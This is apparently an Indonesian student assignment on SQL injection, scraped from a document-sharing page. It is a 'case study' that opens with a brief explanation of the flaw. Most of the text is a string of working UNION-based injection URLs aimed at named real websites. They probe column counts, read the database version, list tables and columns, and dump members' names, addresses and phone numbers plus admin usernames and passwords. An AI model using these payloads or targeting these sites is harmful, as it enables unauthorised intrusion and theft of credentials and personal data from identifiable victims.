Anda di halaman 1dari 18

SQL INJECTION

(Studi Kasus pada Beberapa Web)

TUGAS
Disusun untuk memenuhi UAS mata kuliah Network Security
pada Semester 5 jurusan Teknik Informatika

Oleh:

Bachtiar Yusuf Fajar Kurniawan (1073110)


Jalu Aji Bhaskoro (1073120)
Mohamad Yunus (1073130)

PROGRAM DIPLOMA III TEKNIK INFORMATIKA


POLITEKNIK POS INDONESIA
BANDUNG
2010
Apakah SQL Injection ?
SQL Injection adalah sebuah teknik untuk mengeksporasi aplikasi web dengan memanfaatkan suplai data dari
client dalam sintak SQL (sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi
perintah SQL yang ada di memori aplikasi client). Banyak halaman web memakai parameter dari web user
untuk menggunakan query ke dalam database.Kita ambil sebagai contoh ketika user akan login, halaman user
akan mengirim user dan login sebagai parameter untuk digunakan sebagai SQL dan mencek apakah user dan
password cocok. Dengan SQL Injection ini sangat mungkin untuk kita mengirim user nama dan password dan
dianggap benar. Walaupun mudah untuk menandai dan melindungi model serangan ini, tapi cukup
mengherankan banyak aplikasi web yang terserang dengan metode ini. Pada pembahasan selanjutnya
dicontohkan ketika memakai web server IIS dan Microsoft SQL Server untuk databasenya, sedangkan skrip
yang dipakai adalah ASP.

Sebab terjadinya SQL Injection


Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus --
yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL. Sehingga seorang Hacker menyisipkan
perintah SQL kedalam suatu parameter maupun suatu form.

Apa yang diperlukan


Untuk keperluan SQL Injection kita hanya membutuhkan browser. Browser yang dipakai adalah segala macam
browser. Internet Exploler / Browser, PC yang terhubung internet dan Program atau software seperti softice

Apa yang perlu di cari ?


Kita dapat memanfaatkan halaman-halaman web yang terdapat submit data, contoh: halaman login, pencarian,
feedback, dan lain-lain. Kadang halaman HTML menggunakan metode POST untuk mengirim parameter ke
halaman web yang lain. Jika model halamnnya seperti ini maka kita harus melihat source code karena kita tidak
dapat melihat pada URL. Mudah untuk mencek source code halaman HTML, tinggal klik kanan pilih view
source (pada Internet Exlorer), kemudian cari kode “FORM”. Berikut contoh halaman tersebut:

<FORM action=search.asp method=post>


<input type=hidden name=login value=andi>
</FORM>

Semua yang terletak diantara <FORM> dan </FORM> mempunyai potensial untukdigunakan mengekplorasi
halaman web tersebut. Karena itu dapat menjadi sebuah parameter. Halaman diatas berarti akan mengrimkan
parameter bernama “login”
dengan nilai (value)=”andi”.
http://www.google.co.id/url?sa=t&source=web&ct=res&cd=3&ved=0CBAQFjAC&url=http%3A%2F%2Fp3m.amikom.ac.id%2Fp3m
%2Fdasi%2Fsept04%2F01%2520%2520STMIK%2520AMIKOM%2520Yogyakarta%2520Makalah%2520ANDI%2520_metode
%2520penyerangan_%252010.pdf&rct=j&q=sql+injection+tutorial+filetype
%3Apdf&ei=VoWCS6vmDsGLkAXGg_HGCA&usg=AFQjCNEAjJ9PcHmys_0vytsC4GvTioPKRA
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,2,3,4,5,6

http://www.akbid-alhikmah-jpr.ac.id/news.php?id=1%20UNION%20SELECT%201,@@version,3,4,5,6

http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5,6%20from%20information_schema.tables%20where%20table_schema=database%28%29--
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6c6f67696e--

(table login)

http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5,6%20from%20information_schema.columns%20where%20table_name=0x6d656d626572--

tabel member
http://www.akbid-alhikmah-jpr.ac.id/news.php?id=-1%20UNION%20SELECT%201,group_concat
%28nama,0x3a,alamat,0x3a,telp,0x3a,email%29,3,4,5,6%20from%20member--

http://www.stmikpontianak.ac.id/
http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,3,4,5,6,7,8,9%20--

http://www.stmikpontianak.ac.id/news.php?id=-24%20%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9%20--
http://kaestu.akbideub.ac.id/

http://kaestu.akbideub.ac.id/admin/berita.php?id=7%27

http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20order%20by%205--
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,2,3,4,5

http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,@@version,3,4,5
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28table_name
%29,3,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat%28column_name
%29,3,4,5%20from%20information_schema.columns%20where%20table_name=0x75736572--

(tabel user)
http://kaestu.akbideub.ac.id/admin/berita.php?id=-7%20UNION%20SELECT%201,group_concat
%28username,0x3a,password,0x3a,email,0x3a,admin,0x3a,status%29,3,4,5%20from%20user--

(melihat isi kolom username, password, email, admin, status)

http://www.worcestercountywildcats.com/
http://www.worcestercountywildcats.com/news.php?id=85%27

http://www.worcestercountywildcats.com/news.php?id=-85%20order%20%20by%2012--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12

http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT
%201,2,3,4,5,6,7,8,@@version,10,11,12
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28table_name%29,10,11,12%20from%20information_schema.tables%20where%20table_schema=database%28%29--

http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28column_name%29,10,11,12%20from%20information_schema.columns%20where
%20table_name=0x73796d706f6c6c5f61757468--
http://www.worcestercountywildcats.com/news.php?id=-85%20UNION%20SELECT%201,2,3,4,5,6,7,8,group_concat
%28user,0x3a,pass%29,10,11,12%20from%20sympoll_auth--
http://www.shopaholic.us.com

http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25 order by 9--

http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,2,3,4,5,6,7,8,9
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT
%201,@@version,3,4,5,6,7,8,9

http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28table_name%29,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database
%28%29--
http://www.shopaholic.us.com/themes/main/news.php?type=detail&id=-25%20UNION%20SELECT%201,group_concat
%28column_name%29,3,4,5,6,7,8,9%20from%20information_schema.columns%20where
%20table_name=0x6163636f756e74--

Anda mungkin juga menyukai